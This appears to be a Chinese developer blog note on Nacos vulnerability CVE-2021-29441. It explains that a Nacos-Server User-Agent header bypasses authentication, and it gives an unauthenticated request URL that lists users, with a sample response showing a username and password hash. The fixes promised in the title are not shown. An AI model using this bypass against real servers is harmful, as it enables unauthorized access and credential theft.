Ruoyi-Cloud-Plus_Nacos配置服务漏洞CVE-2021-29441_官方解决方法以及_修改源码解决---SpringCloud工作笔记199

  • 开发
  • 46

CVE-2021-29441

这个漏洞是Nacos的,通过使用postman,直接访问接口:

就可以直接添加nacos的用户

Nacos是Alibaba的一个动态服务发现、配置和服务管理平台。攻击者通过添加Nacos-Server的User-Agent头部将可绕过(nacos.core.auth.enabled=true)鉴权认证,从而进行API操作。

直接get方法访问这个地址:

'http://your_ip:8848/nacos/v1/auth/users/?pageNo=1&pageSize=9'

直接会显示出用户名密码

{
    "totalCount": 1,
    "pageNumber": 1,
    "pagesAvailable": 1,
    "pageItems": [
        {
            "username": "nacos",
            "password": "$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu"
        }
    ]
}

阅读全部

相关推荐

  4. CVE-2023-48795漏洞修复方法

    2024-02-03 16:12:03       46 阅读

  8. ruoyi-vue-plus RepeatSubmit解读

    2024-02-03 16:12:03       29 阅读

最近更新

  3. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-02-03 16:12:03       94 阅读

  4. Could not load dynamic library ‘cudart64_100.dll‘

    2024-02-03 16:12:03       101 阅读

  9. 在Django里面运行非项目文件

    2024-02-03 16:12:03       82 阅读

  19. Python语言-面向对象

    2024-02-03 16:12:03       91 阅读

  20. 如何分清楚常见的 Git 分支管理策略Git Flow、GitHub Flow 和 GitLab Flow

    2024-02-03 16:12:03       85 阅读

热门阅读

  1. armbian修改docker目录到硬盘

    2024-02-03 16:12:03       40 阅读

  2. 【leetcode刷刷】93.复原IP地址 、78.子集 、90.子集II

    2024-02-03 16:12:03       48 阅读

  6. netstat是一个常用的网络工具,用于显示和分析网络连接、路由表以及网络接口等信息。

    2024-02-03 16:12:03       51 阅读

  7. Spring Boot 自定义指标

    2024-02-03 16:12:03       52 阅读

  11. 深度学习的进展

    2024-02-03 16:12:03       46 阅读

  18. 发布订阅模式的应用:解决react中复杂层级的数据交互

    2024-02-03 16:12:03       54 阅读

  19. 安卓开发地址选择器获取外部储存u盘地址并创建pdf文件并写入数据到pdf文件里

    2024-02-03 16:12:03       41 阅读

  22. 自定义函数 Partition table 分区裁剪 Partition Pruning DETERMINISTIC

    2024-02-03 16:12:03       41 阅读

  23. 为什么选择AGPL3.0开源协议

    2024-02-03 16:12:03       47 阅读

  24. STL - list

    2024-02-03 16:12:03       51 阅读